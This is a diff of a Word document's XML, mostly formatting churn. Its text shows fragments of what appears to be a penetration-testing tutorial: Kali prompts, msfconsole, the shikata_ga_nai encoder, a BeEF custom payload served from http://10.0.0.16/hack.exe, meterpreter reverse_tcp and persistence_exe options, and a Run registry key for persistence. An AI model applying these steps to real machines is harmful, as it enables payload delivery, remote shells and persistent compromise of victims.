+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>shikata_ga_nai</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15619,23 +17557,45 @@
           <w:szCs w:val="20"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>root@kali</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="666600"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>:~#</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>root@</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>kali</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="666600"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>:~</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="666600"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>#</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15808,23 +17768,45 @@
           <w:szCs w:val="20"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>root@kali</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="666600"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>:~#</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>root@</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>kali</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="666600"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>:~</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="666600"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>#</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15868,19 +17850,75 @@
         <w:rPr>
           <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
         </w:rPr>
-        <w:t xml:space="preserve"> BeEF </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
-        </w:rPr>
-        <w:t>social engineering</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
-        </w:rPr>
-        <w:t>(assuming already in the BeEF ui panel):</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+        </w:rPr>
+        <w:t>BeEF</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+        </w:rPr>
+        <w:t xml:space="preserve">social </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+        </w:rPr>
+        <w:t>engineering</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+        </w:rPr>
+        <w:t xml:space="preserve">assuming already in the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+        </w:rPr>
+        <w:t>BeEF</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+        </w:rPr>
+        <w:t>ui</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> panel):</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -16058,8 +18096,16 @@
         <w:rPr>
           <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
         </w:rPr>
-        <w:t>Set Payload field to Custom_Payload</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Set Payload field to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+        </w:rPr>
+        <w:t>Custom_Payload</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -16084,14 +18130,7 @@
             <w:rStyle w:val="Hyperlink"/>
             <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
           </w:rPr>
-          <w:t>http://10.0.0.16/</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
-          </w:rPr>
-          <w:t>hack.exe</w:t>
+          <w:t>http://10.0.0.16/hack.exe</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -16252,7 +18291,21 @@
           <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">After execute is hit, this is what the victim will see: </w:t>
+        <w:t xml:space="preserve">After </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+        </w:rPr>
+        <w:t>execute</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is hit, this is what the victim will see: </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -16396,32 +18449,74 @@
           <w:szCs w:val="20"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>root@kali</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="666600"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>:~#</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> msfconsole </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>root@</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>kali</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="666600"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>:~</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="666600"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>#</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>msfconsole</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t> </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -16468,8 +18563,6 @@
         </w:rPr>
         <w:t>…</w:t>
       </w:r>
-      <w:bookmarkStart w:id="22" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="22"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -17586,14 +19679,25 @@
           <w:szCs w:val="20"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">meterpreter </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>meterpreter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17640,14 +19744,25 @@
         </w:rPr>
         <w:t>-</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">i </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17910,6 +20025,7 @@
         </w:rPr>
         <w:t>/</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -17919,6 +20035,7 @@
         </w:rPr>
         <w:t>persistence_exe</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -18063,14 +20180,25 @@
         </w:rPr>
         <w:t>/</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>persistence_exe OPTION</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>persistence_exe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> OPTION</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18585,6 +20713,7 @@
         </w:rPr>
         <w:t>/</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -18594,6 +20723,7 @@
         </w:rPr>
         <w:t>meterpreter</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -18603,14 +20733,25 @@
         </w:rPr>
         <w:t>/</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>reverse_tcp LHOST</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>reverse_tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> LHOST</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19258,7 +21399,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> HKLM\Software\Microsoft\Windows\CurrentVersion\Run\E</w:t>
+        <w:t xml:space="preserve"> HKLM\Software\Microsoft\Windows\CurrentVersion\Run\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>E</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19269,6 +21420,7 @@
         </w:rPr>
         <w:t>CCzyuuYyxPF</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -19384,7 +21536,17 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> HKLM\Software\Microsoft\Windows\CurrentVersion\Run\E</w:t>
+        <w:t xml:space="preserve"> HKLM\Software\Microsoft\Windows\CurrentVersion\Run\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>E</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19395,6 +21557,7 @@
         </w:rPr>
         <w:t>CCzyuuYyxPF</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -19440,14 +21603,25 @@
           <w:szCs w:val="20"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">meterpreter </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>meterpreter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19798,6 +21972,7 @@
     <w:lsdException w:name="HTML Sample" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="HTML Typewriter" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="HTML Variable" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Normal Table" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="annotation subject" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="No List" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Outline List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
@@ -19843,9 +22018,11 @@
     <w:lsdException w:name="Table Subtle 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Subtle 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Web 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Web 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Web 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Balloon Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Grid" w:uiPriority="39"/>
+    <w:lsdException w:name="Table Theme" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Placeholder Text" w:semiHidden="1"/>
     <w:lsdException w:name="No Spacing" w:uiPriority="1" w:qFormat="1"/>
     <w:lsdException w:name="Light Shading" w:uiPriority="60"/>
@@ -20125,6 +22302,7 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
@@ -20495,7 +22673,7 @@
     <w:charset w:val="00"/>
     <w:family w:val="swiss"/>
     <w:pitch w:val="variable"/>
-    <w:sig w:usb0="E0002AFF" w:usb1="C000247B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
+    <w:sig w:usb0="E4002EFF" w:usb1="C000247B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
   </w:font>
   <w:font w:name="Georgia">
     <w:panose1 w:val="02040502050405020303"/>
@@ -20509,10 +22687,9 @@
     <w:charset w:val="00"/>
     <w:family w:val="swiss"/>
     <w:pitch w:val="variable"/>
-    <w:sig w:usb0="E0002AFF" w:usb1="C000247B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
+    <w:sig w:usb0="E4002EFF" w:usb1="C000247B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
   </w:font>
   <w:font w:name="Courier New">
-    <w:altName w:val="Courier New PSMT"/>
     <w:panose1 w:val="02070309020205020404"/>
     <w:charset w:val="00"/>
     <w:family w:val="modern"/>
@@ -20541,7 +22718,6 @@
     <w:sig w:usb0="E00006FF" w:usb1="0000FCFF" w:usb2="00000001" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
   </w:font>
   <w:font w:name="Wingdings">
-    <w:altName w:val="Wingdings"/>
     <w:panose1 w:val="05000000000000000000"/>
     <w:charset w:val="02"/>
     <w:family w:val="auto"/>
@@ -20567,6 +22743,7 @@
   </w:compat>
   <w:rsids>
     <w:rsidRoot w:val="00E562E0"/>
+    <w:rsid w:val="009A4F94"/>
     <w:rsid w:val="00E562E0"/>
   </w:rsids>
   <m:mathPr>
@@ -21401,7 +23578,7 @@
 </file>
 
 <file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{1BEAC93F-9EBF-4DF5-8EE5-6D8B6F83FA22}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{25693780-211E-4EE5-B82B-8E70A0A5FBF7}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>
